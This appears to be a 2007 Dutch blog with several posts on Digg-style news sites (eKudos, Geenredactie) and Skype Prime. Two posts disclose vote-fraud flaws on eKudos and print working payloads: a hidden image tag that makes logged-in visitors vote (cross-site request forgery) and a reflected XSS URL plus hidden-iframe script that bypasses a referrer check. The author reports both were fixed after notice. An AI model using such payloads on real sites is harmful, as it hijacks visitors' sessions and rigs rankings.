eKudos vs. Geenredactie

Gisteren lanceerde Geenstijl de nieuwe Digg-kloon Geenredactie.nl. Tijd voor een vergelijkend warenonderzoek tussen eKudos en Geenredactie.
Het artikel met de aankondiging van Geenredactie stond op beide sites tegelijkertijd op de eerste positie op de voorpagina. Zie hieronder de grafiek waarin de het aantal bezoekers afkomstig van de twee sites tegen elkaar zijn uitgezet:


Maar liefst 73.38% van alle bezoekers op dit weblog kwam gisteren vanaf Geenredactie.nl. 18.16% was afkomstig van eKudos. Na één dag heeft Geenredactie eKudos dus al ingehaald en is ruim vier keer zo groot.
Zou deze strijd nu al gestreden zijn? Ik ben benieuwd.

Geenredactie.nl: Nieuwe digg-kloon van Geenstijl

Eerst was er Digg. Maar die was niet vaderlands. Toen was er eKudos. Vervolgens volgden er nog een hele reeks waaronder Tipt, Link'r, NieuwsFilter en MSN Reporter. Ook lekte al uit dat Nu.nl (Ilse) binnenkort met een Digg-kloon komt genaamd "Nujij.nl".
En nu, 12 maart 2007, lanceert ook GeenStijl haar Digg-kloon: Geenredactie.nl.
Geenredactie.nl wil zich onderscheiden door een 'Revenue Share' aan te bieden aan de submitters; personen die een artikel plaatsen ontvangen een deel van de inkomsten die via Google Adsense gegenereerd worden.
"Het is voor ons meer aardigheidje", aldus Hoxha van Geenstijl. "Kijken of het groot wordt".

Stemfraude op eKudos - Deel 2

Afgelopen donderdag schreef ik een artikel over stemfraude op eKudos. Binnen enkele uren had eKudos haar website aangepast zodat deze vorm van misbruik niet meer mogelijk is. Kudos aan eKudos voor de snelle response :)
De beveiliging die eKudos heeft toegepast is een zogenaamde 'referrer check' waarbij zij controleren vanaf welk domein de aanroep afkomstig is. Toegegeven, een beetje flauw, maar ik heb een mogelijkheid gevonden om deze beveiliging te omzeilen.
eKudos heeft op tenminste één plek een XSS (cross site scripting) vulnerability. Kwaadwillende gebruikers kunnen zo HTML en/of Javascript injecteren in de pagina's van eKudos. Met een eenvoudig stukje Javascript is het via deze bug mogelijk een redirect te triggeren op eKudos zelf, waardoor de referrer afkomstig is van het domein eKudos.nl.

De XSS vulnerability bevindt zich in het zoek script van eKudos:
http://www.ekudos.nl/zoeken/%3Cscript%3Ealert(%22hello%20world%22)%3B%3C%2Fscript%3E

Met behulp van onderstaande code kan via deze manier automatisch een stem worden uitgebracht:

<div id="ek"></div>
<script type="text/javascript">
var url = 'http://www.ekudos.nl/kudobox/kudo?url=' + escape('http://JOUW_WEBSITE_URL');
var xpl = 'http://www.ekudos.nl/zoeken/' + encodeURIComponent('<scr'+'ipt>document.location.href=\'' + url + '\';</scr' + 'ipt>');
var el = document.getElementById('ek');
var ifr = document.createElement('iframe');
ifr.style.width = '400px';
ifr.style.height = '400px';
ifr.style.visibility = 'hidden';
ifr.src = xpl;
el.appendChild(ifr);
</script>

Ik heb de makers van eKudos reeds geinformeerd over dit probleem. Wederom waren ze er als de kippen bij; het probleem is inmiddels al verholpen. Goed werk, jongens!

Stemfraude op eKudos

Sinds een dag heb ik bij de artikelen op deze weblog naast de Digg-box ook de "Kudobox" van eKudos toegevoegd.
Met de tekst "Meer bezoekers naar je weblog? Zet je artikel op eKudos en plaats de stemknop op je eigen pagina." probeert eKudos zieltjes te winnen. Druk is het er nog niet, maar ach, een handjevol bezoekers per dag er bij doet mijn bezoekersaantal toch al gauw verdubbelen. Moet je natuurlijk wel op de voorpagina van eKudos terecht zien te komen.

Heel moeilijk is het niet om op een eerlijke wijze op de frontpage van eKudos te komen. Een stuk eenvoudiger dan bij de populaire Amerikaanse variant Digg.com.
Maar het kan eenvoudiger: valsspelen.
Bij eKudos is het mogelijk doormiddel van een iframe of image tag op je website automatisch kudos te ontvangen van iedereen die je website bezoekt, en ingelogd is op eKudos.

Een voorbeeld:

<img src="http://www.ekudos.nl/kudobox/kudo?url=JOUW_WEBSITE_URL" style="visibility: hidden;" height="1" width="1" />

Vergeet niet eerst zelf even het artikel toe te voegen aan eKudos, anders wordt de stem niet geteld.

Dit probleem is overigens niet nieuw (diverse websites hebben dit in het verleden ondervonden), en is eenvoudig op te lossen door bijvoorbeeld een referrer controle of een captcha toe te voegen.

Update (15:37): Dit artikel staat nu op #1 op eKudos. Ook werd ik in de tussentijd getipt dat ik oud nieuws meldt; Netters.nl meldde dit al eerder. Met dank aan Bèr Kessels voor het melden :)

Update: (15:52): Zoals jullie in de comments kunnen zien heeft eKudos inmiddels haar website aangepast en is deze vorm van stemfraude niet meer mogelijk.

Nieuw: Skype Prime

Skype introduceert Skype Prime, een nieuwe service waarmee gebruikers elkaar per minuut of per gesprek een tarief in rekening kunnen brengen. Dit werkt zowel voor telefoongesprekken als videocalls. Gebruikers kunnen zelf bepalen welk tarief zij in rekening willen brengen, met een maximum van 2 euro per minuut of 10 euro per gesprek. Dat is dus fors hoger dan de limiet die van toepassing is op 0900 en 0906 diensten.
Skype brengt de kosten in rekening op het Skype krediet en betaalt de gebruikers via PayPal, Skype's zusterbedrijf.

Nieuwsgierige lezers zijn van harte welkom mijn Prime services te proberen: